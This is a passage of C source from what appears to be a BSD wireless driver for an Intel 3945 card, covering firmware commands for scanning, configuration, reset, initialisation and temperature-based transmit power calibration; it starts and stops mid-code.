((ic->ic_curmode == IEEE80211_MODE_11A) ? WPI_OFDM6 : WPI_CCK2) : i - 1; /* try one time at this rate before falling back to "next" */ mrr.rates[i].ntries = 1; } /* setup MRR for control frames */ mrr.which = WPI_MRR_CTL; error = wpi_cmd(sc, WPI_CMD_MRR_SETUP, &mrr, sizeof mrr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not setup MRR for control frames\n"); return error; } /* setup MRR for data frames */ mrr.which = WPI_MRR_DATA; error = wpi_cmd(sc, WPI_CMD_MRR_SETUP, &mrr, sizeof mrr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not setup MRR for data frames\n"); return error; } return 0; } static void wpi_set_led(struct wpi_softc *sc, uint8_t which, uint8_t off, uint8_t on) { struct wpi_cmd_led led; led.which = which; led.unit = htole32(100000); /* on/off in unit of 100ms */ led.off = off; led.on = on; (void)wpi_cmd(sc, WPI_CMD_SET_LED, &led, sizeof led, 1); } static void wpi_enable_tsf(struct wpi_softc *sc, struct ieee80211_node *ni) { struct wpi_cmd_tsf tsf; uint64_t val, mod; memset(&tsf, 0, sizeof tsf); memcpy(&tsf.tstamp, ni->ni_tstamp.data, 8); tsf.bintval = htole16(ni->ni_intval); tsf.lintval = htole16(10); /* compute remaining time until next beacon */ val = (uint64_t)ni->ni_intval * 1024; /* msec -> usec */ mod = le64toh(tsf.tstamp) % val; tsf.binitval = htole32((uint32_t)(val - mod)); if (wpi_cmd(sc, WPI_CMD_TSF, &tsf, sizeof tsf, 1) != 0) device_printf(sc->sc_dev, "could not enable TSF\n"); } #if 0 /* * Build a beacon frame that the firmware will broadcast periodically in * IBSS or HostAP modes. */ static int wpi_setup_beacon(struct wpi_softc *sc, struct ieee80211_node *ni) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_tx_ring *ring = &sc->cmdq; struct wpi_tx_desc *desc; struct wpi_tx_data *data; struct wpi_tx_cmd *cmd; struct wpi_cmd_beacon *bcn; struct ieee80211_beacon_offsets bo; struct mbuf *m0; bus_addr_t physaddr; int error; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; m0 = ieee80211_beacon_alloc(ic, ni, &bo); if (m0 == NULL) { device_printf(sc->sc_dev, "could not allocate beacon frame\n"); return ENOMEM; } cmd = &ring->cmd[ring->cur]; cmd->code = WPI_CMD_SET_BEACON; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; bcn = (struct wpi_cmd_beacon *)cmd->data; memset(bcn, 0, sizeof (struct wpi_cmd_beacon)); bcn->id = WPI_ID_BROADCAST; bcn->ofdm_mask = 0xff; bcn->cck_mask = 0x0f; bcn->lifetime = htole32(WPI_LIFETIME_INFINITE); bcn->len = htole16(m0->m_pkthdr.len); bcn->rate = (ic->ic_curmode == IEEE80211_MODE_11A) ? wpi_plcp_signal(12) : wpi_plcp_signal(2); bcn->flags = htole32(WPI_TX_AUTO_SEQ | WPI_TX_INSERT_TSTAMP); /* save and trim IEEE802.11 header */ m_copydata(m0, 0, sizeof (struct ieee80211_frame), (caddr_t)&bcn->wh); m_adj(m0, sizeof (struct ieee80211_frame)); /* assume beacon frame is contiguous */ error = bus_dmamap_load(ring->data_dmat, data->map, mtod(m0, void *), m0->m_pkthdr.len, wpi_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map beacon\n"); m_freem(m0); return error; } data->m = m0; /* first scatter/gather segment is used by the beacon command */ desc->flags = htole32(WPI_PAD32(m0->m_pkthdr.len) << 28 | 2 << 24); desc->segs[0].addr = htole32(ring->cmd_dma.paddr + ring->cur * sizeof (struct wpi_tx_cmd)); desc->segs[0].len = htole32(4 + sizeof (struct wpi_cmd_beacon)); desc->segs[1].addr = htole32(physaddr); desc->segs[1].len = htole32(m0->m_pkthdr.len); /* kick cmd ring */ ring->cur = (ring->cur + 1) % WPI_CMD_RING_COUNT; WPI_WRITE(sc, WPI_TX_WIDX, ring->qid << 8 | ring->cur); return 0; } #endif static int wpi_auth(struct wpi_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni = vap->iv_bss; struct wpi_node_info node; int error; /* update adapter's configuration */ sc->config.associd = 0; sc->config.filter &= ~htole32(WPI_FILTER_BSS); IEEE80211_ADDR_COPY(sc->config.bssid, ni->ni_bssid); sc->config.chan = ieee80211_chan2ieee(ic, ni->ni_chan); if (IEEE80211_IS_CHAN_2GHZ(ni->ni_chan)) { sc->config.flags |= htole32(WPI_CONFIG_AUTO | WPI_CONFIG_24GHZ); } else { sc->config.flags &= ~htole32(WPI_CONFIG_AUTO | WPI_CONFIG_24GHZ); } if (IEEE80211_IS_CHAN_A(ni->ni_chan)) { sc->config.cck_mask = 0; sc->config.ofdm_mask = 0x15; } else if (IEEE80211_IS_CHAN_B(ni->ni_chan)) { sc->config.cck_mask = 0x03; sc->config.ofdm_mask = 0; } else { /* XXX assume 802.11b/g */ sc->config.cck_mask = 0x0f; sc->config.ofdm_mask = 0x15; } DPRINTF(("config chan %d flags %x cck %x ofdm %x\n", sc->config.chan, sc->config.flags, sc->config.cck_mask, sc->config.ofdm_mask)); error = wpi_cmd(sc, WPI_CMD_CONFIGURE, &sc->config, sizeof (struct wpi_config), 1); if (error != 0) { device_printf(sc->sc_dev, "could not configure\n"); return error; } /* configuration has changed, set Tx power accordingly */ if ((error = wpi_set_txpower(sc, ni->ni_chan, 1)) != 0) { device_printf(sc->sc_dev, "could not set Tx power\n"); return error; } /* add default node */ memset(&node, 0, sizeof node); IEEE80211_ADDR_COPY(node.bssid, ni->ni_bssid); node.id = WPI_ID_BSS; node.rate = (ic->ic_curmode == IEEE80211_MODE_11A) ? wpi_plcp_signal(12) : wpi_plcp_signal(2); node.action = htole32(WPI_ACTION_SET_RATE); node.antenna = WPI_ANTENNA_BOTH; error = wpi_cmd(sc, WPI_CMD_ADD_NODE, &node, sizeof node, 1); if (error != 0) device_printf(sc->sc_dev, "could not add BSS node\n"); return (error); } static int wpi_run(struct wpi_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni = vap->iv_bss; int error; if (vap->iv_opmode == IEEE80211_M_MONITOR) { /* link LED blinks while monitoring */ wpi_set_led(sc, WPI_LED_LINK, 5, 5); return 0; } wpi_enable_tsf(sc, ni); /* update adapter's configuration */ sc->config.associd = htole16(ni->ni_associd & ~0xc000); /* short preamble/slot time are negotiated when associating */ sc->config.flags &= ~htole32(WPI_CONFIG_SHPREAMBLE | WPI_CONFIG_SHSLOT); if (ic->ic_flags & IEEE80211_F_SHSLOT) sc->config.flags |= htole32(WPI_CONFIG_SHSLOT); if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) sc->config.flags |= htole32(WPI_CONFIG_SHPREAMBLE); sc->config.filter |= htole32(WPI_FILTER_BSS); /* XXX put somewhere HC_QOS_SUPPORT_ASSOC + HC_IBSS_START */ DPRINTF(("config chan %d flags %x\n", sc->config.chan, sc->config.flags)); error = wpi_cmd(sc, WPI_CMD_CONFIGURE, &sc->config, sizeof (struct wpi_config), 1); if (error != 0) { device_printf(sc->sc_dev, "could not update configuration\n"); return error; } error = wpi_set_txpower(sc, ni->ni_chan, 1); if (error != 0) { device_printf(sc->sc_dev, "could set txpower\n"); return error; } /* link LED always on while associated */ wpi_set_led(sc, WPI_LED_LINK, 0, 1); /* start automatic rate control timer */ callout_reset(&sc->calib_to, 60*hz, wpi_calib_timeout, sc); return (error); } /* * Send a scan request to the firmware. Since this command is huge, we map it * into a mbufcluster instead of using the pre-allocated set of commands. Note, * much of this code is similar to that in wpi_cmd but because we must manually * construct the probe & channels, we duplicate what's needed here. XXX In the * future, this function should be modified to use wpi_cmd to help cleanup the * code base. */ static int wpi_scan(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_scan_state *ss = ic->ic_scan; struct wpi_tx_ring *ring = &sc->cmdq; struct wpi_tx_desc *desc; struct wpi_tx_data *data; struct wpi_tx_cmd *cmd; struct wpi_scan_hdr *hdr; struct wpi_scan_chan *chan; struct ieee80211_frame *wh; struct ieee80211_rateset *rs; struct ieee80211_channel *c; enum ieee80211_phymode mode; uint8_t *frm; int nrates, pktlen, error, i, nssid; bus_addr_t physaddr; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; data->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (data->m == NULL) { device_printf(sc->sc_dev, "could not allocate mbuf for scan command\n"); return ENOMEM; } cmd = mtod(data->m, struct wpi_tx_cmd *); cmd->code = WPI_CMD_SCAN; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; hdr = (struct wpi_scan_hdr *)cmd->data; memset(hdr, 0, sizeof(struct wpi_scan_hdr)); /* * Move to the next channel if no packets are received within 5 msecs * after sending the probe request (this helps to reduce the duration * of active scans). */ hdr->quiet = htole16(5); hdr->threshold = htole16(1); if (IEEE80211_IS_CHAN_A(ic->ic_curchan)) { /* send probe requests at 6Mbps */ hdr->tx.rate = wpi_ridx_to_plcp[WPI_OFDM6]; /* Enable crc checking */ hdr->promotion = htole16(1); } else { hdr->flags = htole32(WPI_CONFIG_24GHZ | WPI_CONFIG_AUTO); /* send probe requests at 1Mbps */ hdr->tx.rate = wpi_ridx_to_plcp[WPI_CCK1]; } hdr->tx.id = WPI_ID_BROADCAST; hdr->tx.lifetime = htole32(WPI_LIFETIME_INFINITE); hdr->tx.flags = htole32(WPI_TX_AUTO_SEQ); memset(hdr->scan_essids, 0, sizeof(hdr->scan_essids)); nssid = MIN(ss->ss_nssid, WPI_SCAN_MAX_ESSIDS); for (i = 0; i < nssid; i++) { hdr->scan_essids[i].id = IEEE80211_ELEMID_SSID; hdr->scan_essids[i].esslen = MIN(ss->ss_ssid[i].len, 32); memcpy(hdr->scan_essids[i].essid, ss->ss_ssid[i].ssid, hdr->scan_essids[i].esslen); #ifdef WPI_DEBUG if (wpi_debug & WPI_DEBUG_SCANNING) { printf("Scanning Essid: "); ieee80211_print_essid(hdr->scan_essids[i].essid, hdr->scan_essids[i].esslen); printf("\n"); } #endif } /* * Build a probe request frame. Most of the following code is a * copy & paste of what is done in net80211. */ wh = (struct ieee80211_frame *)&hdr->scan_essids[4]; wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_REQ; wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; IEEE80211_ADDR_COPY(wh->i_addr1, ifp->if_broadcastaddr); IEEE80211_ADDR_COPY(wh->i_addr2, IF_LLADDR(ifp)); IEEE80211_ADDR_COPY(wh->i_addr3, ifp->if_broadcastaddr); *(u_int16_t *)&wh->i_dur[0] = 0; /* filled by h/w */ *(u_int16_t *)&wh->i_seq[0] = 0; /* filled by h/w */ frm = (uint8_t *)(wh + 1); /* add essid IE, the hardware will fill this in for us */ *frm++ = IEEE80211_ELEMID_SSID; *frm++ = 0; mode = ieee80211_chan2mode(ic->ic_curchan); rs = &ic->ic_sup_rates[mode]; /* add supported rates IE */ *frm++ = IEEE80211_ELEMID_RATES; nrates = rs->rs_nrates; if (nrates > IEEE80211_RATE_SIZE) nrates = IEEE80211_RATE_SIZE; *frm++ = nrates; memcpy(frm, rs->rs_rates, nrates); frm += nrates; /* add supported xrates IE */ if (rs->rs_nrates > IEEE80211_RATE_SIZE) { nrates = rs->rs_nrates - IEEE80211_RATE_SIZE; *frm++ = IEEE80211_ELEMID_XRATES; *frm++ = nrates; memcpy(frm, rs->rs_rates + IEEE80211_RATE_SIZE, nrates); frm += nrates; } /* setup length of probe request */ hdr->tx.len = htole16(frm - (uint8_t *)wh); /* * Construct information about the channel that we * want to scan. The firmware expects this to be directly * after the scan probe request */ c = ic->ic_curchan; chan = (struct wpi_scan_chan *)frm; chan->chan = ieee80211_chan2ieee(ic, c); chan->flags = 0; if (!(c->ic_flags & IEEE80211_CHAN_PASSIVE)) { chan->flags |= WPI_CHAN_ACTIVE; if (nssid != 0) chan->flags |= WPI_CHAN_DIRECT; } chan->gain_dsp = 0x6e; /* Default level */ if (IEEE80211_IS_CHAN_5GHZ(c)) { chan->active = htole16(10); chan->passive = htole16(ss->ss_maxdwell); chan->gain_radio = 0x3b; } else { chan->active = htole16(20); chan->passive = htole16(ss->ss_maxdwell); chan->gain_radio = 0x28; } DPRINTFN(WPI_DEBUG_SCANNING, ("Scanning %u Passive: %d\n", chan->chan, c->ic_flags & IEEE80211_CHAN_PASSIVE)); hdr->nchan++; chan++; frm += sizeof (struct wpi_scan_chan); #if 0 // XXX All Channels.... for (c = &ic->ic_channels[1]; c <= &ic->ic_channels[IEEE80211_CHAN_MAX]; c++) { if ((c->ic_flags & ic->ic_curchan->ic_flags) != ic->ic_curchan->ic_flags) continue; chan->chan = ieee80211_chan2ieee(ic, c); chan->flags = 0; if (!(c->ic_flags & IEEE80211_CHAN_PASSIVE)) { chan->flags |= WPI_CHAN_ACTIVE; if (ic->ic_des_ssid[0].len != 0) chan->flags |= WPI_CHAN_DIRECT; } chan->gain_dsp = 0x6e; /* Default level */ if (IEEE80211_IS_CHAN_5GHZ(c)) { chan->active = htole16(10); chan->passive = htole16(110); chan->gain_radio = 0x3b; } else { chan->active = htole16(20); chan->passive = htole16(120); chan->gain_radio = 0x28; } DPRINTFN(WPI_DEBUG_SCANNING, ("Scanning %u Passive: %d\n", chan->chan, c->ic_flags & IEEE80211_CHAN_PASSIVE)); hdr->nchan++; chan++; frm += sizeof (struct wpi_scan_chan); } #endif hdr->len = htole16(frm - (uint8_t *)hdr); pktlen = frm - (uint8_t *)cmd; error = bus_dmamap_load(ring->data_dmat, data->map, cmd, pktlen, wpi_dma_map_addr, &physaddr, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "could not map scan command\n"); m_freem(data->m); data->m = NULL; return error; } desc->flags = htole32(WPI_PAD32(pktlen) << 28 | 1 << 24); desc->segs[0].addr = htole32(physaddr); desc->segs[0].len = htole32(pktlen); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); /* kick cmd ring */ ring->cur = (ring->cur + 1) % WPI_CMD_RING_COUNT; WPI_WRITE(sc, WPI_TX_WIDX, ring->qid << 8 | ring->cur); sc->sc_scan_timer = 5; return 0; /* will be notified async. of failure/success */ } /** * Configure the card to listen to a particular channel, this transisions the * card in to being able to receive frames from remote devices. */ static int wpi_config(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wpi_power power; struct wpi_bluetooth bluetooth; struct wpi_node_info node; int error; /* set power mode */ memset(&power, 0, sizeof power); power.flags = htole32(WPI_POWER_CAM|0x8); error = wpi_cmd(sc, WPI_CMD_SET_POWER_MODE, &power, sizeof power, 0); if (error != 0) { device_printf(sc->sc_dev, "could not set power mode\n"); return error; } /* configure bluetooth coexistence */ memset(&bluetooth, 0, sizeof bluetooth); bluetooth.flags = 3; bluetooth.lead = 0xaa; bluetooth.kill = 1; error = wpi_cmd(sc, WPI_CMD_BLUETOOTH, &bluetooth, sizeof bluetooth, 0); if (error != 0) { device_printf(sc->sc_dev, "could not configure bluetooth coexistence\n"); return error; } /* configure adapter */ memset(&sc->config, 0, sizeof (struct wpi_config)); IEEE80211_ADDR_COPY(sc->config.myaddr, IF_LLADDR(ifp)); /*set default channel*/ sc->config.chan = htole16(ieee80211_chan2ieee(ic, ic->ic_curchan)); sc->config.flags = htole32(WPI_CONFIG_TSF); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { sc->config.flags |= htole32(WPI_CONFIG_AUTO | WPI_CONFIG_24GHZ); } sc->config.filter = 0; switch (ic->ic_opmode) { case IEEE80211_M_STA: case IEEE80211_M_WDS: /* No know setup, use STA for now */ sc->config.mode = WPI_MODE_STA; sc->config.filter |= htole32(WPI_FILTER_MULTICAST); break; case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: sc->config.mode = WPI_MODE_IBSS; sc->config.filter |= htole32(WPI_FILTER_BEACON | WPI_FILTER_MULTICAST); break; case IEEE80211_M_HOSTAP: sc->config.mode = WPI_MODE_HOSTAP; break; case IEEE80211_M_MONITOR: sc->config.mode = WPI_MODE_MONITOR; sc->config.filter |= htole32(WPI_FILTER_MULTICAST | WPI_FILTER_CTL | WPI_FILTER_PROMISC); break; default: device_printf(sc->sc_dev, "unknown opmode %d\n", ic->ic_opmode); return EINVAL; } sc->config.cck_mask = 0x0f; /* not yet negotiated */ sc->config.ofdm_mask = 0xff; /* not yet negotiated */ error = wpi_cmd(sc, WPI_CMD_CONFIGURE, &sc->config, sizeof (struct wpi_config), 0); if (error != 0) { device_printf(sc->sc_dev, "configure command failed\n"); return error; } /* configuration has changed, set Tx power accordingly */ if ((error = wpi_set_txpower(sc, ic->ic_curchan, 0)) != 0) { device_printf(sc->sc_dev, "could not set Tx power\n"); return error; } /* add broadcast node */ memset(&node, 0, sizeof node); IEEE80211_ADDR_COPY(node.bssid, ifp->if_broadcastaddr); node.id = WPI_ID_BROADCAST; node.rate = wpi_plcp_signal(2); error = wpi_cmd(sc, WPI_CMD_ADD_NODE, &node, sizeof node, 0); if (error != 0) { device_printf(sc->sc_dev, "could not add broadcast node\n"); return error; } /* Setup rate scalling */ error = wpi_mrr_setup(sc); if (error != 0) { device_printf(sc->sc_dev, "could not setup MRR\n"); return error; } return 0; } static void wpi_stop_master(struct wpi_softc *sc) { uint32_t tmp; int ntries; DPRINTFN(WPI_DEBUG_HW,("Disabling Firmware execution\n")); tmp = WPI_READ(sc, WPI_RESET); WPI_WRITE(sc, WPI_RESET, tmp | WPI_STOP_MASTER | WPI_NEVO_RESET); tmp = WPI_READ(sc, WPI_GPIO_CTL); if ((tmp & WPI_GPIO_PWR_STATUS) == WPI_GPIO_PWR_SLEEP) return; /* already asleep */ for (ntries = 0; ntries < 100; ntries++) { if (WPI_READ(sc, WPI_RESET) & WPI_MASTER_DISABLED) break; DELAY(10); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for master\n"); } } static int wpi_power_up(struct wpi_softc *sc) { uint32_t tmp; int ntries; wpi_mem_lock(sc); tmp = wpi_mem_read(sc, WPI_MEM_POWER); wpi_mem_write(sc, WPI_MEM_POWER, tmp & ~0x03000000); wpi_mem_unlock(sc); for (ntries = 0; ntries < 5000; ntries++) { if (WPI_READ(sc, WPI_GPIO_STATUS) & WPI_POWERED) break; DELAY(10); } if (ntries == 5000) { device_printf(sc->sc_dev, "timeout waiting for NIC to power up\n"); return ETIMEDOUT; } return 0; } static int wpi_reset(struct wpi_softc *sc) { uint32_t tmp; int ntries; DPRINTFN(WPI_DEBUG_HW, ("Resetting the card - clearing any uploaded firmware\n")); /* clear any pending interrupts */ WPI_WRITE(sc, WPI_INTR, 0xffffffff); tmp = WPI_READ(sc, WPI_PLL_CTL); WPI_WRITE(sc, WPI_PLL_CTL, tmp | WPI_PLL_INIT); tmp = WPI_READ(sc, WPI_CHICKEN); WPI_WRITE(sc, WPI_CHICKEN, tmp | WPI_CHICKEN_RXNOLOS); tmp = WPI_READ(sc, WPI_GPIO_CTL); WPI_WRITE(sc, WPI_GPIO_CTL, tmp | WPI_GPIO_INIT); /* wait for clock stabilization */ for (ntries = 0; ntries < 25000; ntries++) { if (WPI_READ(sc, WPI_GPIO_CTL) & WPI_GPIO_CLOCK) break; DELAY(10); } if (ntries == 25000) { device_printf(sc->sc_dev, "timeout waiting for clock stabilization\n"); return ETIMEDOUT; } /* initialize EEPROM */ tmp = WPI_READ(sc, WPI_EEPROM_STATUS); if ((tmp & WPI_EEPROM_VERSION) == 0) { device_printf(sc->sc_dev, "EEPROM not found\n"); return EIO; } WPI_WRITE(sc, WPI_EEPROM_STATUS, tmp & ~WPI_EEPROM_LOCKED); return 0; } static void wpi_hw_config(struct wpi_softc *sc) { uint32_t rev, hw; /* voodoo from the Linux "driver".. */ hw = WPI_READ(sc, WPI_HWCONFIG); rev = pci_read_config(sc->sc_dev, PCIR_REVID, 1); if ((rev & 0xc0) == 0x40) hw |= WPI_HW_ALM_MB; else if (!(rev & 0x80)) hw |= WPI_HW_ALM_MM; if (sc->cap == 0x80) hw |= WPI_HW_SKU_MRC; hw &= ~WPI_HW_REV_D; if ((le16toh(sc->rev) & 0xf0) == 0xd0) hw |= WPI_HW_REV_D; if (sc->type > 1) hw |= WPI_HW_TYPE_B; WPI_WRITE(sc, WPI_HWCONFIG, hw); } static void wpi_rfkill_resume(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); int ntries; /* enable firmware again */ WPI_WRITE(sc, WPI_UCODE_CLR, WPI_RADIO_OFF); WPI_WRITE(sc, WPI_UCODE_CLR, WPI_DISABLE_CMD); /* wait for thermal sensors to calibrate */ for (ntries = 0; ntries < 1000; ntries++) { if ((sc->temp = (int)WPI_READ(sc, WPI_TEMPERATURE)) != 0) break; DELAY(10); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for thermal calibration\n"); return; } DPRINTFN(WPI_DEBUG_TEMP,("temperature %d\n", sc->temp)); if (wpi_config(sc) != 0) { device_printf(sc->sc_dev, "device config failed\n"); return; } ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; sc->flags &= ~WPI_FLAG_HW_RADIO_OFF; if (vap != NULL) { if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { if (vap->iv_opmode != IEEE80211_M_MONITOR) { ieee80211_beacon_miss(ic); wpi_set_led(sc, WPI_LED_LINK, 0, 1); } else wpi_set_led(sc, WPI_LED_LINK, 5, 5); } else { ieee80211_scan_next(vap); wpi_set_led(sc, WPI_LED_LINK, 20, 2); } } callout_reset(&sc->watchdog_to, hz, wpi_watchdog, sc); } static void wpi_init_locked(struct wpi_softc *sc, int force) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; int ntries, qid; wpi_stop_locked(sc); (void)wpi_reset(sc); wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_CLOCK1, 0xa00); DELAY(20); tmp = wpi_mem_read(sc, WPI_MEM_PCIDEV); wpi_mem_write(sc, WPI_MEM_PCIDEV, tmp | 0x800); wpi_mem_unlock(sc); (void)wpi_power_up(sc); wpi_hw_config(sc); /* init Rx ring */ wpi_mem_lock(sc); WPI_WRITE(sc, WPI_RX_BASE, sc->rxq.desc_dma.paddr); WPI_WRITE(sc, WPI_RX_RIDX_PTR, sc->shared_dma.paddr + offsetof(struct wpi_shared, next)); WPI_WRITE(sc, WPI_RX_WIDX, (WPI_RX_RING_COUNT - 1) & ~7); WPI_WRITE(sc, WPI_RX_CONFIG, 0xa9601010); wpi_mem_unlock(sc); /* init Tx rings */ wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_MODE, 2); /* bypass mode */ wpi_mem_write(sc, WPI_MEM_RA, 1); /* enable RA0 */ wpi_mem_write(sc, WPI_MEM_TXCFG, 0x3f); /* enable all 6 Tx rings */ wpi_mem_write(sc, WPI_MEM_BYPASS1, 0x10000); wpi_mem_write(sc, WPI_MEM_BYPASS2, 0x30002); wpi_mem_write(sc, WPI_MEM_MAGIC4, 4); wpi_mem_write(sc, WPI_MEM_MAGIC5, 5); WPI_WRITE(sc, WPI_TX_BASE_PTR, sc->shared_dma.paddr); WPI_WRITE(sc, WPI_MSG_CONFIG, 0xffff05a5); for (qid = 0; qid < 6; qid++) { WPI_WRITE(sc, WPI_TX_CTL(qid), 0); WPI_WRITE(sc, WPI_TX_BASE(qid), 0); WPI_WRITE(sc, WPI_TX_CONFIG(qid), 0x80200008); } wpi_mem_unlock(sc); /* clear "radio off" and "disable command" bits (reversed logic) */ WPI_WRITE(sc, WPI_UCODE_CLR, WPI_RADIO_OFF); WPI_WRITE(sc, WPI_UCODE_CLR, WPI_DISABLE_CMD); sc->flags &= ~WPI_FLAG_HW_RADIO_OFF; /* clear any pending interrupts */ WPI_WRITE(sc, WPI_INTR, 0xffffffff); /* enable interrupts */ WPI_WRITE(sc, WPI_MASK, WPI_INTR_MASK); WPI_WRITE(sc, WPI_UCODE_CLR, WPI_RADIO_OFF); WPI_WRITE(sc, WPI_UCODE_CLR, WPI_RADIO_OFF); if ((wpi_load_firmware(sc)) != 0) { device_printf(sc->sc_dev, "A problem occurred loading the firmware to the driver\n"); return; } /* At this point the firmware is up and running. If the hardware * RF switch is turned off thermal calibration will fail, though * the card is still happy to continue to accept commands, catch * this case and schedule a task to watch for it to be turned on. */ wpi_mem_lock(sc); tmp = wpi_mem_read(sc, WPI_MEM_HW_RADIO_OFF); wpi_mem_unlock(sc); if (!(tmp & 0x1)) { sc->flags |= WPI_FLAG_HW_RADIO_OFF; device_printf(sc->sc_dev,"Radio Transmitter is switched off\n"); goto out; } /* wait for thermal sensors to calibrate */ for (ntries = 0; ntries < 1000; ntries++) { if ((sc->temp = (int)WPI_READ(sc, WPI_TEMPERATURE)) != 0) break; DELAY(10); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for thermal sensors calibration\n"); return; } DPRINTFN(WPI_DEBUG_TEMP,("temperature %d\n", sc->temp)); if (wpi_config(sc) != 0) { device_printf(sc->sc_dev, "device config failed\n"); return; } ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; out: callout_reset(&sc->watchdog_to, hz, wpi_watchdog, sc); } static void wpi_init(void *arg) { struct wpi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; WPI_LOCK(sc); wpi_init_locked(sc, 0); WPI_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vaps */ } static void wpi_stop_locked(struct wpi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; int ac; sc->sc_tx_timer = 0; sc->sc_scan_timer = 0; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); sc->flags &= ~WPI_FLAG_HW_RADIO_OFF; callout_stop(&sc->watchdog_to); callout_stop(&sc->calib_to); /* disable interrupts */ WPI_WRITE(sc, WPI_MASK, 0); WPI_WRITE(sc, WPI_INTR, WPI_INTR_MASK); WPI_WRITE(sc, WPI_INTR_STATUS, 0xff); WPI_WRITE(sc, WPI_INTR_STATUS, 0x00070000); wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_MODE, 0); wpi_mem_unlock(sc); /* reset all Tx rings */ for (ac = 0; ac < 4; ac++) wpi_reset_tx_ring(sc, &sc->txq[ac]); wpi_reset_tx_ring(sc, &sc->cmdq); /* reset Rx ring */ wpi_reset_rx_ring(sc, &sc->rxq); wpi_mem_lock(sc); wpi_mem_write(sc, WPI_MEM_CLOCK2, 0x200); wpi_mem_unlock(sc); DELAY(5); wpi_stop_master(sc); tmp = WPI_READ(sc, WPI_RESET); WPI_WRITE(sc, WPI_RESET, tmp | WPI_SW_RESET); sc->flags &= ~WPI_FLAG_BUSY; } static void wpi_stop(struct wpi_softc *sc) { WPI_LOCK(sc); wpi_stop_locked(sc); WPI_UNLOCK(sc); } static void wpi_calib_timeout(void *arg) { struct wpi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); int temp; if (vap->iv_state != IEEE80211_S_RUN) return; /* update sensor data */ temp = (int)WPI_READ(sc, WPI_TEMPERATURE); DPRINTFN(WPI_DEBUG_TEMP,("Temp in calibration is: %d\n", temp)); wpi_power_calibration(sc, temp); callout_reset(&sc->calib_to, 60*hz, wpi_calib_timeout, sc); } /* * This function is called periodically (every 60 seconds) to adjust output * power to temperature changes. */ static void wpi_power_calibration(struct wpi_softc *sc, int temp) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); /* sanity-check read value */ if (temp < -260 || temp > 25) { /* this can't be correct, ignore */ DPRINTFN(WPI_DEBUG_TEMP, ("out-of-range temperature reported: %d\n", temp)); return; } DPRINTFN(WPI_DEBUG_TEMP,("temperature %d->%d\n", sc->temp, temp)); /* adjust Tx power if need be */ if (abs(temp - sc->temp) <= 6) return; sc->temp = temp; if (wpi_set_txpower(sc, vap->iv_bss->ni_chan, 1) != 0) { /* just warn, too bad for the automatic calibration... */ device_printf(sc->sc_dev,"could not adjust Tx power\n"); } } /** * Read the eeprom to find out what channels are valid for the given * band and update net80211 with what we find. */ static void wpi_read_eeprom_channels(struct wpi_softc *sc, int n) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct wpi_chan_band *band = &wpi_bands[n]; struct wpi_eeprom_chan channels[WPI_MAX_CHAN_PER_BAND]; struct ieee80211_channel *c; int chan, i, passive; wpi_read_prom_data(sc, band->addr, channels, band->nchan * sizeof (struct wpi_eeprom_chan)); for (i = 0; i < band->nchan; i++) { if (!(channels[i].flags & WPI_EEPROM_CHAN_VALID)) { DPRINTFN(WPI_DEBUG_HW, ("Channel Not Valid: %d, band %d\n", band->chan[i],n)); continue; } passive = 0; chan = band->chan[i]; c = &ic->ic_channels[ic->ic_nchans++]; /* is active scan allowed on this channel? */ if (!(channels[i].flags & WPI_EEPROM_CHAN_ACTIVE)) { passive = 